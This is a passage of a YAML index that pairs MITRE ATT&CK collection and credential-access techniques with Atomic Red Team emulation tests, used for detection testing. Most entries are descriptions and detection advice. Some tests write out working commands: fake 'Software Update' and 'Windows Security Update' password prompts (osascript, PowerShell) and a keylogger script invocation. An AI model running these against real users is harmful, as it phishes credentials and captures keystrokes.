- - AWS CloudTrail logs
- x_mitre_permissions_required:
- - User
- atomic_tests: []
- T1213:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1213
- url: https://attack.mitre.org/techniques/T1213
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- description: |-
- Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.
-
- Adversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.
-
- The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
-
- * Policies, procedures, and standards
- * Physical / logical network diagrams
- * System architecture diagrams
- * Technical system documentation
- * Testing / development credentials
- * Work / project schedules
- * Source code snippets
- * Links to network shares and other internal resources
-
- Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.
- name: Data from Information Repositories
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-06-30T22:50:06.087Z'
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '2.1'
- x_mitre_contributors:
- - Praetorian
- - Milos Stojadinovic
- x_mitre_data_sources:
- - Azure activity logs
- - AWS CloudTrail logs
- - Stackdriver logs
- - OAuth audit logs
- - Application logs
- - Authentication logs
- - Data loss prevention
- - Third-party application logs
- x_mitre_detection: |-
- As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
-
- The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- - SaaS
- - AWS
- - GCP
- - Azure
- - Office 365
- atomic_tests: []
- T1005:
- technique:
- created: '2017-05-31T21:30:20.537Z'
- modified: '2020-05-26T19:21:25.974Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1005
- external_id: T1005
- description: |
- Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
-
- Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
- name: Data from Local System
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: Monitor processes and command-line arguments for actions
- that could be taken to collect files from a system. Remote access tools with
- built-in features may interact directly with the Windows API to gather data.
- Data may also be acquired through Windows system management tools such as
- [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_system_requirements:
- - Privileges to access certain files and directories
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- atomic_tests: []
- T1039:
- technique:
- id: attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data from Network Shared Drive
- description: Adversaries may search network shares on computers they have compromised
- to find files of interest. Sensitive data can be collected from remote systems
- via shared network drives (host shared directory, network file server, etc.)
- that are accessible from the current system prior to Exfiltration. Interactive
- command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
- may be used to gather information.
- external_references:
- - source_name: mitre-attack
- external_id: T1039
- url: https://attack.mitre.org/techniques/T1039
- - external_id: CAPEC-639
- source_name: capec
- url: https://capec.mitre.org/data/definitions/639.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T15:42:44.026Z'
- created: '2017-05-31T21:30:41.022Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_system_requirements:
- - Privileges to access network shared drive
- x_mitre_detection: Monitor processes and command-line arguments for actions
- that could be taken to collect files from a network share. Remote access tools
- with built-in features may interact directly with the Windows API to gather
- data. Data may also be acquired through Windows system management tools such
- as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '1.2'
- atomic_tests: []
- T1025:
- technique:
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data from Removable Media
- description: "Adversaries may search connected removable media on computers
- they have compromised to find files of interest. Sensitive data can be collected
- from any removable media (optical disk drive, USB memory, etc.) connected
- to the compromised system prior to Exfiltration. Interactive command shells
- may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
- may be used to gather information. \n\nSome adversaries may also use [Automated
- Collection](https://attack.mitre.org/techniques/T1119) on removable media."
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T15:44:46.584Z'
- created: '2017-05-31T21:30:31.584Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_system_requirements:
- - Privileges to access removable media drive and files
- x_mitre_detection: Monitor processes and command-line arguments for actions
- that could be taken to collect files from a system's connected removable media.
- Remote access tools with built-in features may interact directly with the
- Windows API to gather data. Data may also be acquired through Windows system
- management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '1.1'
- atomic_tests: []
- T1114:
- technique:
- id: attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Email Collection
- description: 'Adversaries may target user email to collect sensitive information.
- Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
- external_references:
- - source_name: mitre-attack
- external_id: T1114
- url: https://attack.mitre.org/techniques/T1114
- - description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
- Retrieved October 8, 2019.
- url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T18:31:06.417Z'
- created: '2017-05-31T21:31:25.454Z'
- x_mitre_contributors:
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_is_subtechnique: false
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_detection: |-
- There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
-
- File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
-
- Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
-
- Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
- x_mitre_data_sources:
- - Office 365 trace logs
- - Mail server
- - Email gateway
- - Authentication logs
- - File monitoring
- - Process monitoring
- - Process use of network
- x_mitre_version: '2.1'
- atomic_tests: []
- T1114.003:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1114.003
- url: https://attack.mitre.org/techniques/T1114/003
- - source_name: US-CERT TA18-068A 2018
- url: https://www.us-cert.gov/ncas/alerts/TA18-086A
- description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
- by Cyber Actors. Retrieved October 2, 2019.
- - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
- url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
- description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
- Retrieved October 8, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Email Forwarding Rule
- description: "Adversaries may setup email forwarding rules to collect sensitive
- information. Adversaries may abuse email-forwarding rules to monitor the activities
- of a victim, steal information, and further gain intelligence on the victim
- or the victim’s organization to use as part of further exploits or operations.(Citation:
- US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create
- inbox rules for various email functions, including forwarding to a different
- recipient. Messages can be forwarded to internal or external recipients, and
- there are no restrictions limiting the extent of this rule. Administrators
- may also create forwarding rules for user accounts with the same considerations
- and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)
- \n\nAny user or administrator within the organization (or adversary with valid
- credentials) can create rules to automatically forward all received messages
- to another recipient, forward emails to different locations based on the sender,
- and more."
- id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T18:29:48.994Z'
- created: '2020-02-19T18:54:47.103Z'
- x_mitre_contributors:
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
-
- Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
- x_mitre_data_sources:
- - Process use of network
- - Process monitoring
- - Email gateway
- - Mail server
- - Office 365 trace logs
- x_mitre_platforms:
- - Office 365
- - Windows
- atomic_tests: []
- T1056.002:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1056.002
- url: https://attack.mitre.org/techniques/T1056/002
- - external_id: CAPEC-659
- source_name: capec
- url: https://capec.mitre.org/data/definitions/659.html
- - url: https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
- description: Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits
- Mackeeper. Retrieved July 3, 2017.
- source_name: OSX Malware Exploits MacKeeper
- - source_name: LogRhythm Do You Trust Oct 2014
- url: https://logrhythm.com/blog/do-you-trust-your-computer/
- description: Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved
- December 17, 2018.
- - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
- description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware
- is hungry for credentials. Retrieved July 3, 2017.
- source_name: OSX Keydnap malware
- - source_name: Enigma Phishing for Credentials Jan 2015
- url: https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/
- description: 'Nelson, M. (2015, January 21). Phishing for Credentials: If
- you want it, just ask!. Retrieved December 17, 2018.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: GUI Input Capture
- description: "Adversaries may mimic common operating system GUI components to
- prompt users for credentials with a seemingly legitimate prompt. When programs
- are executed that need additional privileges than are present in the current
- user context, it is common for the operating system to prompt the user for
- proper credentials to authorize the elevated privileges for the task (ex:
- [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries
- may mimic this functionality to prompt users for credentials with a seemingly
- legitimate prompt for a number of reasons that mimic normal usage, such as
- a fake installer requiring additional access or a fake malware removal suite.(Citation:
- OSX Malware Exploits MacKeeper) This type of prompt can be used to collect
- credentials via various languages such as AppleScript(Citation: LogRhythm
- Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation:
- LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials
- Jan 2015). "
- id: attack-pattern--a2029942-0a85-4947-b23c-ca434698171d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T20:56:14.853Z'
- created: '2020-02-11T18:58:45.908Z'
- x_mitre_contributors:
- - Matthew Molyett, @s1air, Cisco Talos
- x_mitre_data_sources:
- - PowerShell logs
- - User interface
- - Process command-line parameters
- - Process monitoring
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
-
- Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - macOS
- - Windows
- identifier: T1056.002
- atomic_tests:
- - name: AppleScript - Prompt User for Password
- auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15
- description: |
- Prompt User for Password (Local Phishing)
- Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
- supported_platforms:
- - macos
- executor:
- command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
- app "System Preferences" to activate'' -e ''tell app "System Preferences"
- to display dialog "Software Update requires that you type your password
- to apply changes." & return & return default answer "" with icon 1 with
- hidden answer with title "Software Update"''
-
-'
- name: bash
- - name: PowerShell - Prompt User for Password
- auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
- description: |
- Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
-
- Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
- supported_platforms:
- - windows
- executor:
- command: "# Creates GUI to prompt for password. Expect long pause before prompt
- is available. \n$cred = $host.UI.PromptForCredential('Windows Security
- Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using
- write-warning to allow message to show on console as echo and other similar
- commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning
- $cred.GetNetworkCredential().Password\n"
- name: powershell
- T1056:
- technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1056
- url: https://attack.mitre.org/techniques/T1056
- - external_id: CAPEC-569
- source_name: capec
- url: https://capec.mitre.org/data/definitions/569.html
- - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
- description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
- look into keyloggers on Windows. Retrieved April 27, 2016.'
- source_name: Adventures of a Keystroke
- description: Adversaries may use methods of capturing user input to obtain credentials
- or collect information. During normal system usage, users often provide credentials
- to various different locations, such as login pages/portals or system dialog
- boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential
- API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving
- the user into providing input into what they believe to be a genuine service
- (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).
- name: Input Capture
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T21:29:13.900Z'
- created: '2017-05-31T21:30:48.323Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_data_sources:
- - Windows Registry
- - Windows event logs
- - User interface
- - Process command-line parameters
- - Process monitoring
- - PowerShell logs
- - Loaded DLLs
- - Kernel drivers
- - DLL monitoring
- - Binary file metadata
- - API monitoring
- x_mitre_detection: 'Detection may vary depending on how input is captured but
- may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
- `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
- monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
- and ensuring no unauthorized drivers or kernel modules that could indicate
- keylogging or API hooking are present.'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- atomic_tests: []
- T1056.001:
- technique:
- id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
- description: |-
- Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
-
- Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
-
- * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- * Reading raw keystroke data from the hardware buffer.
- * Windows Registry modifications.
- * Custom drivers.
- name: Keylogging
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1056.001
- url: https://attack.mitre.org/techniques/T1056/001
- - external_id: CAPEC-568
- source_name: capec
- url: https://capec.mitre.org/data/definitions/568.html
- - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
- description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
- look into keyloggers on Windows. Retrieved April 27, 2016.'
- source_name: Adventures of a Keystroke
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T20:45:52.998Z'
- created: '2020-02-11T18:58:11.791Z'
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification
- to the Registry and installation of a driver, setting a hook, or polling to
- intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`,
- and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry
- and file system for such changes, monitor driver installs, and look for common
- keylogging API calls. API calls alone are not an indicator of keylogging,
- but may provide behavioral data that is useful when combined with other information
- such as new files written to disk and unusual processes.'
- x_mitre_permissions_required:
- - Administrator
- - root
- - SYSTEM
- - User
- x_mitre_data_sources:
- - Windows Registry
- - Process monitoring
- - API monitoring
- identifier: T1056.001
- atomic_tests:
- - name: Input Capture
- auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26
- description: |
- Utilize PowerShell and external resource to capture keystrokes
- [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
- Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
-
- Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.
- supported_platforms:
- - windows
- input_arguments:
- filepath:
- description: Name of the local file, include path.
- type: Path
- default: "$env:TEMP\\key.log"
- executor:
- command: |
- Set-Location $PathToAtomicsFolder
- .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
- cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
-
-'
- name: powershell
- elevation_required: true
- T1557.001:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1557.001
- url: https://attack.mitre.org/techniques/T1557/001
- - url: https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
- description: Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution.
- Retrieved November 17, 2017.
- source_name: Wikipedia LLMNR
- - url: https://technet.microsoft.com/library/cc958811.aspx
- description: Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November
- 17, 2017.
- source_name: TechNet NetBIOS
- - source_name: byt3bl33d3r NTLM Relaying
- url: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- description: Salvati, M. (2017, June 2). Practical guide to NTLM Relaying
- in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February
- 7, 2019.
- - source_name: Secure Ideas SMB Relay
- url: https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
- description: Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays
- Should Be On Your Mind. Retrieved February 7, 2019.
- - url: https://github.com/nomex/nbnspoof
- description: Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.
- source_name: GitHub NBNSpoof
- - url: https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
- description: Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.
- source_name: Rapid7 LLMNR Spoofer
- - url: https://github.com/SpiderLabs/Responder
- description: Gaffie, L. (2016, August 25). Responder. Retrieved November 17,
- 2017.
- source_name: GitHub Responder
- - url: https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
- description: 'Sternstein, J. (2013, November). Local Network Attacks: LLMNR
- and NBT-NS Poisoning. Retrieved November 17, 2017.'
- source_name: Sternsecurity LLMNR-NBTNS
- - url: https://github.com/Kevin-Robertson/Conveigh
- description: Robertson, K. (2016, August 28). Conveigh. Retrieved November
- 17, 2017.
- source_name: GitHub Conveigh
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: LLMNR/NBT-NS Poisoning and SMB Relay
- description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
- spoof an authoritative source for name resolution to force communication with
- an adversary controlled system. This activity may be used to collect or relay
- authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR)
- and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve
- as alternate methods of host identification. LLMNR is based upon the Domain
- Name System (DNS) format and allows hosts on the same local link to perform
- name resolution for other hosts. NBT-NS identifies systems on a local network
- by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries
- can spoof an authoritative source for name resolution on a victim network
- by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know
- the identity of the requested host, effectively poisoning the service so that
- the victims will communicate with the adversary controlled system. If the
- requested host belongs to a resource that requires identification/authentication,
- the username and NTLMv2 hash will then be sent to the adversary controlled
- system. The adversary can then collect the hash information sent over the
- wire through tools that monitor the ports for traffic or through [Network
- Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes
- offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to
- obtain the plaintext passwords. In some cases where an adversary has access
- to a system that is in the authentication path between systems or when automated
- scans that use credentials attempt to authenticate to an adversary controlled
- system, the NTLMv2 hashes can be intercepted and relayed to access and execute
- code against a target system. The relay step can happen in conjunction with
- poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation:
- Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison
- name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).
- (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub
- Responder)"
- id: attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-31T13:54:08.239Z'
- created: '2020-02-11T19:08:51.677Z'
- x_mitre_contributors:
- - Eric Kuehn, Secure Ideas
- - Matthew Demaske, Adaptforward
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - Packet capture
- - Netflow/Enclave netflow
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
-
- Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
-
- Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
- atomic_tests: []
- T1074.001:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Local Data Staging
- description: Adversaries may stage collected data in a central location or directory
- on the local system prior to Exfiltration. Data may be kept in separate files
- or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560).
- Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106)
- and bash may be used to copy data into a staging location.
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-05-26T19:23:54.854Z'
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
